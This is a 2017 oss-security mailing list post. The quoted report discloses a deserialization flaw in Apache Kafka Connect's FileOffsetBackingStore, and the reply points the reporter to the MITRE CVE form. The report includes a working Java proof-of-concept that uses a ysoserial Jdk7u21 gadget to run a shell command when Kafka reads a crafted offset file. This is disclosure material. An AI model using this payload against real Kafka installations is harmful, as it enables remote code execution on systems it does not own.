Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 19 Jul 2017 11:15:13 +0200
From: Salvatore Bonaccorso <carnil@...ian.org>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-IDs request for Apache Kafka desrialization
 vulnerability via runtime

On Wed, Jul 19, 2017 at 09:41:16AM +1000, Hooman Ghasem Broujerdi wrote:
> Hi,
> 
> Apache kafka connect-api runtime contains a desrialization vul via
> FileOffsetBackingStore
> which leads to remote code execution, this can be exploited reliably in
> JDK1.7.0_05, below is
> a unit test for it:
> 
> 
> import junit.framework.Test;
> import junit.framework.TestCase;
> import junit.framework.TestSuite;
> import org.apache.commons.io.FileUtils;
> import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
> import org.apache.kafka.connect.storage.FileOffsetBackingStore;
> import ysoserial.payloads.Jdk7u21;
> 
> import java.io.ByteArrayOutputStream;
> import java.io.File;
> import java.io.IOException;
> import java.io.ObjectOutputStream;
> import java.util.HashMap;
> import java.util.Map;
> 
> public void test_Kafka_Deser() throws Exception {
> 
>         StandaloneConfig config;
> 
>         String projectDir = System.getProperty("user.dir");
> 
>         Jdk7u21 jdk7u21 = new Jdk7u21();
>         Object o = jdk7u21.getObject("touch vul");
> 
>         byte[] ser = serialize(o);
> 
>         File tempFile = new File(projectDir + "/payload.ser");
>         FileUtils.writeByteArrayToFile(tempFile, ser);
> 
>         Map<String, String> props = new HashMap<String, String>();
>         props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
> tempFile.getAbsolutePath());
>         props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
> "org.apache.kafka.connect.json.JsonConverter");
>         config = new StandaloneConfig(props);
> 
>         FileOffsetBackingStore restore = new FileOffsetBackingStore();
>         restore.configure(config);
>         restore.start();
>     }
> 
>     private byte[] serialize(Object object) throws IOException {
>         ByteArrayOutputStream bout = new ByteArrayOutputStream();
>         ObjectOutputStream out = new ObjectOutputStream(bout);
>         out.writeObject(object);
>         out.flush();
>         return bout.toByteArray();
>     }

Thanks for reaching out the oss-security list. Unfortunately direct
CVE assignments cannot be request anymore through the list, rather
please fill the form at https://cveform.mitre.org/

Once you have the CVE assigned, can you please followup with the
assignement in this thread, so that other are informed about it?

Regards,
Salvatore

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ